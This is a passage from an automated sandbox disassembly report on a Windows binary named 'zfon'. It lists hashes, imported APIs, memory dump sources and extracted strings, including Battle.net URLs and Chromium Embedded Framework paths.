                                                                                                                                                                            • Opcode ID: 5417b77c524c30663f1f256b045522e958b35b3579d87da6e87b169c52188e26
                                                                                                                                                                            • Instruction ID: 672cc2288c9a2faf19c92f93e98a07c682f14c65fa403390a4328f94bc92f4f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 5417b77c524c30663f1f256b045522e958b35b3579d87da6e87b169c52188e26
                                                                                                                                                                            • Instruction Fuzzy Hash: D301D465F1864582EF24AB38E450339A390FB84704F900835DB8D4BB91FF3CD4528720

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B484B4
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B484DE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: setlocale$freemallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1663771476-0

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2803490479-0

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _onexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 572287377-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturncef_string_map_allocfree$malloc
                                                                                                                                                                            • String ID: /shop/$battle.net$https$www.battlenet.com.cn
                                                                                                                                                                            • API String ID: 3106151382-2878237680
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$memcpymemmove$malloc
                                                                                                                                                                            • String ID: ([:\/]|\?|\n|$)
                                                                                                                                                                            • API String ID: 2735842428-1527476142
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1462992686-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: freemallocmemcpy$memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2260118914-0
                                                                                                                                                                            • Opcode ID: f625bcf806322541c94781342d928d36ba4744acfacca47c0fe88d790c7e6fc5
                                                                                                                                                                            • Instruction ID: af440f1f26276fae962656934aaeb7084947ba4af7bbcbf97b8dc18d34d05d82
                                                                                                                                                                            • Opcode Fuzzy Hash: f625bcf806322541c94781342d928d36ba4744acfacca47c0fe88d790c7e6fc5
                                                                                                                                                                            • Instruction Fuzzy Hash: 26E15022F09A8689FF20EBB5D4503FDA3B2AB44798F944635DE5E17AC9DF38D4058360
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF79D074F63
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                            • API String ID: 389471666-631824599
                                                                                                                                                                            • Opcode ID: 1350812c3d0dfa734be90a980c35df2e82d1e245d48463fcd563a86e7718f8f5
                                                                                                                                                                            • Instruction ID: 0a8e2cc2b6aa8992acaa66b8feec5a7df71d951de3d6eda3bbf317d41238a567
                                                                                                                                                                            • Opcode Fuzzy Hash: 1350812c3d0dfa734be90a980c35df2e82d1e245d48463fcd563a86e7718f8f5
                                                                                                                                                                            • Instruction Fuzzy Hash: 67114C36A18B4297E725AB36EA54379B2A5FF44345F804135C68D87A90FF7CE074C720
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoLocale___lc_locale_name_func__crt
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2625200093-0
                                                                                                                                                                            • Opcode ID: 452bc398865e805a221a8c6e4f8b9859baf2ce5d8fdd9b436033a1a2ba9836ed
                                                                                                                                                                            • Instruction ID: 8d662879f9ad15e4550b1b6d9e4b59257de4a2482da6869818e311ca04d2cc6b
                                                                                                                                                                            • Opcode Fuzzy Hash: 452bc398865e805a221a8c6e4f8b9859baf2ce5d8fdd9b436033a1a2ba9836ed
                                                                                                                                                                            • Instruction Fuzzy Hash: C3F0A7BE62964247E7549F64D0D06A56370E788710FC06035EE4A52299CB58D8CACF10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$FileSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2086374402-0
                                                                                                                                                                            • Opcode ID: cc3fefdac151d0d6c1831a70d1ab07d2dc3f3163a8702bb6ad1aa6244e1ccde4
                                                                                                                                                                            • Instruction ID: 13b807798c8569baf75774d3a9722e8788f23855de0608b71b631c5acfe4724f
                                                                                                                                                                            • Opcode Fuzzy Hash: cc3fefdac151d0d6c1831a70d1ab07d2dc3f3163a8702bb6ad1aa6244e1ccde4
                                                                                                                                                                            • Instruction Fuzzy Hash: 64E0BF7662954487DB81CF69F49051AB7A0FB88B84B446021FA9B87B18DA3CD4548F00

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                            • API String ID: 2943138195-1482988683
                                                                                                                                                                            • Opcode ID: 42bd956a0521df0bb215b1c300124c972e1b6c0f845a56a9a1a0b204cefc3c34
                                                                                                                                                                            • Instruction ID: e3377bfa83c5c9cb120703ac07975ecdeda6f8769a5d77e2c97271776e219ec6
                                                                                                                                                                            • Opcode Fuzzy Hash: 42bd956a0521df0bb215b1c300124c972e1b6c0f845a56a9a1a0b204cefc3c34
                                                                                                                                                                            • Instruction Fuzzy Hash: F30283FAE1869388FB148F74D8942BE37B1BB05384F622535DA0D76A98DF3CA545CB40

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            APIs
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC6620
                                                                                                                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF79CFC6770
                                                                                                                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF79CFC67BE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC682C
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC683C
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC684C
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC6859
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC68A7
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC68F2
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC6902
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC6912
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC691F
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC6966
                                                                                                                                                                              • Part of subcall function 00007FF79CFDB3E0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF79CFDB43B
                                                                                                                                                                              • Part of subcall function 00007FF79CFDB3E0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF79CFDB46C
                                                                                                                                                                              • Part of subcall function 00007FF79CFDB3E0: GetLastError.KERNEL32 ref: 00007FF79CFDB49E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC69B1
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC69C1
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC69D1
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC69DE
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC6A1F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@cef_string_map_alloc$??6?$basic_ostream@V01@$??0?$basic_ostream@??0?$basic_streambuf@D@std@@@1@_ErrorLastV?$basic_streambuf@
                                                                                                                                                                            • String ID: browser=$ frame=$ request=$ response.status=$ response.statusText=$?$[OnResourceResponse]$c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                                                                                            • API String ID: 2865712288-1385742800
                                                                                                                                                                            • Opcode ID: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                                                                                            • Instruction ID: bbdb8efaad4963a9a3c197c13e13d5bf330871f054e45e9d85b707e98ca3951a
                                                                                                                                                                            • Opcode Fuzzy Hash: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                                                                                            • Instruction Fuzzy Hash: DAE17172A0CA8685EF24EB75E4543A9A772FF84B94F844535DA8D07BA9DF3CD484C320
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$free$cef_string_map_allocmemcpy$mallocmemmove
                                                                                                                                                                            • String ID: writeCertHolder
                                                                                                                                                                            • API String ID: 614388589-1003169611
                                                                                                                                                                            • Opcode ID: c14c586a15bddfdb8530b59ebaa6b24ae1ffb11342b534e436a16f3ce6ed9210
                                                                                                                                                                            • Instruction ID: 2190a869d31918c829a51d82ebd2e46986ac144a9d6c5ae4b3aec6547ad950a2
                                                                                                                                                                            • Opcode Fuzzy Hash: c14c586a15bddfdb8530b59ebaa6b24ae1ffb11342b534e436a16f3ce6ed9210
                                                                                                                                                                            • Instruction Fuzzy Hash: D2128023B09A4284EF20EF75D4943ADA7B2EB44B94F949436DE4E57BA9DF38D444C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
